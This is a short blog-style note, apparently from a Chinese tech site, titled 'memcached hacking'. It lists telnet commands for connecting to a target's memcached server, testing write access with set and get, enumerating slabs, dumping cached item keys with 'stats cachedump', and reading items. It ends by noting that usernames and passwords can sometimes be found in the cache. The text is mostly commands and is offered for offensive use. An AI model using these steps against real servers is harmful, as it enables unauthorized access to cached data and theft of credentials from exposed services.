memcached hacking

1,Test:

telnet target port

stats:check the information

set pnig0s 0 0 10

pnig0s1992

get pnig0s

if echo "stored" then it works well.

stats slabs:lis all slabs of this memcached sever.

stats detail on:make the memcached listed all details of each slab.

stats cachedump [slab's ID] [echo amount]

now,u got the name of items,u can use get [name] to check it.

username & password sometimes can be found in the cache.good luck!

 

你可能感兴趣的:(memcached,职场,休闲,hacking)